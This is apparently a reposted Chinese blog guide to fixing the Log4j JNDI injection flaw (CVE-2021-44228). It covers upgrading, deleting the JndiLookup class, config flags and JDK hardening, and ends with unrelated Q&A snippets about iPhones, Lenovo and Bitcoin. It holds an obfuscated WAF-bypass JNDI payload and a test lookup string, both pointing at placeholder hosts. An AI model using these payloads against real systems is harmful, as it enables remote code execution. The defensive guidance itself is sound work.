Log4j严重漏洞修最新复方案参考
CVE-2021-44228,原理上是 log4j-core 代码中的 JNDI 注入漏洞。这个漏洞可以直接导致服务器被入侵,而且由于"日志"场景的特性,攻击数据可以多层传导,甚至可以威胁到纯内网的服务器。log4j 作为 Java 开发的基础公共日志类,使用范围非常广,漏洞必定影响深远,想想当年commons-collections反序列化漏洞的影响范围。
Github漏洞公告:https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
影响 < 2.15.0 的所有 2.x 版本。也就是说,除了最新版本之外的所有版本都受影响。
最直接、有效、稳定的修复方式是:将 log4j-core 升级到 2.15.0 版本
最直接、有效、稳定的修复方式是:将 log4j-core 升级到 2.15.0 版本
最直接、有效、稳定的修复方式是:将 log4j-core 升级到 2.15.0 版本
如果实在无法升级,可以尝试把漏洞类删掉。其他修复方式可以结合使用起到比较好的快速缓解作用,但受限于不同的环境,可能会产生各种各样比较麻烦的问题或者未来的隐患。长期修复方案需要保证稳定、可靠、持久有效,这种严重漏洞值得一个发布和重启。
2.15.0 版本下载地址:https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/
pom.xml 配置 org.apache.logging.log4j log4j-core 2.15.0 缓解方式1:接入安全产品
第一时间上WAF规则、RASP拦截等措施,给修复争取时间。
但是也要注意一些静态规则上的绕过,log4j 支持的写法比较多,有非常多绕过姿势。比如: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc} 缓解方式2:删除漏洞类
通过删除漏洞类进行修复的方案比较稳,也是官方推荐的一种修复方案。直接删除 log4j jar 包中存在漏洞的类: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
这种修复比较方便快捷,一般业务代码也不会用到 jndi lookup 这个功能。不过可能会对基于版本号判定的安全数据采集造成一定困扰,无法准确统计漏洞的最新受影响情况。建议删除之后在 jar 包后面加上一定的标记,如: log4j-2.14.1.sec.jar
另外,由于某些原因不想删除的话,可以自己代码替换原始的 JndiLookup 类,将它加到业务代码中。需要注意的是,必须保证它在 log4j 原类之前加载。 package org.apache.logging.log4j.core.lookup; public class JndiLookup { public JndiLookup() { throw new NoClassDefFoundError("JNDI lookup is disabled"); } }
也可以做成依赖包,在 log4j-core 之前添加,可以实现同样的效果(注意不要引入不可信的第三方依赖,可能导致潜在安全风险,以下配置来源互联网,仅作为示例,请勿直接使用): org.glavo log4j-patch 1.0
当然也可以通过RASP的方式干掉漏洞类,Github上有不少RASP的无损修复方案,比如:
https://github.com/chaitin/log4j2-vaccine
https://github.com/boundaryx/cloudrasp-log4j2 缓解方式3:通过配置禁用 log4j 的 lookup 功能
禁用的方式就比较多了。然而下面2、3、4这几种方式对低于 2.10 版本的 log4j-core 都没有效果,而且环境变量和启动参数这种设置,在迁移或者变更的过程中丢失的可能性比较大。log4j 在 2.15.0 版本中默认就已经关闭了 lookup 功能。
log4j2.component.properties、log4j2.xml 默认放在 ClassPath 路径下,如:源代码的资源目录或者可执行程序所在的当前目录。 1. 设置日志输出 Pattern 格式
对于 >=2.7 的版本,在 log4j 中对每一个日志输出格式进行修改。在 %msg 占位符后面添加 {nolookups},这种方式的适用范围比其他三种配置更广。比如在 log4j2.xml 中配置: <?xml version="1.0" encoding="UTF-8"?> public class Test { public static void main(String[] args) { String t = "${jndi:ldap://xxx.com/xxx}"; Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME); logger.error(t); } } 2. 设置JVM系统属性
在 Java 应用启动参数中增加 -Dlog4j2.formatMsgNoLookups=true,或者在业务代码中设置系统属性: // 必须在 log4j 实例化之前设置该系统属性 System.setProperty("log4j2.formatMsgNoLookups", "true"); Logger logger = LogManager.getLogger(LogManager.ROOT_LOGGER_NAME); 3. 修改配置文件
在配置文件 log4j2.component.properties 中增加:log4j2.formatMsgNoLookups=true,配置文件放置于应用程序的 ClassPath 路径下。 4. 设置进程环境变量
在环境变量中增加:LOG4J_FORMAT_MSG_NO_LOOKUPS=true 注意!这些配置和属性,并不能在所有场景下生效,比如在 logstash 中就无法生效: Solutions and Mitigations: The widespread flag -Dlog4j2.formatMsgNoLookups=true does NOT mitigate the vulnerability in Logstash, as Logstash uses Log4j in a way where the flag has no effect. It is therefore necessary to remove the JndiLookup class from the log4j2 core jar, with the following command:
zip -q -d /logstash-core/lib/jars/log4j-core-2.* org/apache/logging/log4j/core/lookup/JndiLookup.class
Refer: https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476 缓解方式4:升级JDK版本
对于Oracle JDK 11.0.1、8u191、7u201、6u211或者更高版本的JDK来说,默认就已经禁用了 RMI Reference、LDAP Reference 的远程加载。对于 RCE 来说,可以起到很直接的缓解作用,可以作为增强型的加固方案。
在高版本JDK环境下,JNDI注入也还是存在一定RCE风险,可以参考这篇文章:https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html
另外 log4j 漏洞本身除了 RCE,还存在着巨大的攻击面,比如 SSRF、敏感信息泄露等等,威胁非常大,不要企图仅仅通过升级JDK版本来修复漏洞,建议还是老老实实升级。
原文链接:https://kingx.me/Patch-log4j.html
如果这篇文章对你有帮助麻烦点赞关注一下
苹果手机怎么截图?iPhone截图有两种方法首先,可以用组合按键的方法进行截图,具体操作为同时按下电源键(iPhone6之后的产品在机身右侧,iPhone5s之前的产品在机身上方)和HOME键,即可
对电脑一窍不通该怎么学?初学电脑,建议从以下5个方面展开1电脑基础,包括鼠标键盘基本操作,打字指法,提高自己的打字速度2windonws相关操作,包括文件管理软件管理控制面板系统维护等3学习Office办
比特币就是一个骗局,为什么还这么多人相信?谢谢邀请!谁定义比特币是个骗局?请站出来解释一下,以正视听。比特币诞生己10年了,参与比特币交易的人也越来越多。没有哪个骗局能骗10年之久。尽管世界上大多数国家央行不承认比特币的货
喷联想的人那么多,联想错哪里了?联想原来是全村的希望,后来堕落了,平庸了,这就是他的错吧联想错在卖国求荣,错在东西在国内卖高价,美国卖低价,错在给美国军方送电脑。老板就不应该是柳家人,是人家倪光南院士的,完全是空
如果这次联想倒下了,有什么可以补位的国产电脑?联想倒不了,就算是把柳杨绳之以法,也会重组,派一些能力强的人接手,因为联想不是柳传志的,是倪光南院士创立的国有企业,柳不过是巧取豪夺,侵吞了联想(张捷评联想系列),相信联想以后会更
深圳抄电表的兼职哪里找?没人来抄表啦,现在很多小区都换了智能电表,后台自动读取数据。我们这么破的小区都没人来抄过。天然气也是,新装的都没有来抄过但是会发收费单。有些老的小区就是让拍照就可以了。智能电表1)
用友网络科技随着新一轮科技革命和数字经济加快演进,世界已进入新旧动能转换的关键期,企业服务产业正面临三大市场机遇数智化国产化和全球化。首先,从个人到组织再到社会,都在快速向数智化转型,企业数智
曝5GiPhoneSE明年一季度推出明年有望生产3000万部据国外媒体报道,在推出全系支持5G网络连接的iPhone12和iPhone13之后,苹果iPhone产品线中的iPhoneSE何时转向5G也备受关注。而外媒最新的报道显示,有研究机
是谁让任正非如此尊敬?这个名字大家都很熟悉自从智能手机发展以来,经历过大哥大时代诺基亚时代,国内手机品牌的企业也逐渐发展,甚至扩大到全球,而最让人值得铭记的两个大品牌,除了华为,联想也是一样曾经经历过辉煌,说是人尽皆知也不
贵州制造迈向贵州智造王婷莫姝十四五期间贵州智能制造将显露三大发展特征,系统集成工艺智能化人工智能技术成为关注焦点。系统集成将成为推动贵州智能制造高速发展的核心动力。当前,企业实现智能制造的策略逐步升级
舆论后的联想,给无数企业带来了哪些深思?首先定位好企业与国家和人民的关系,不光是为钱,须知任何企业如果没有国家和人民这个根夲支持是走不远的,企业主体不要为了钱什么都不顾,为国为民贡献是宗旨,发展的立足点与社会长远需求同步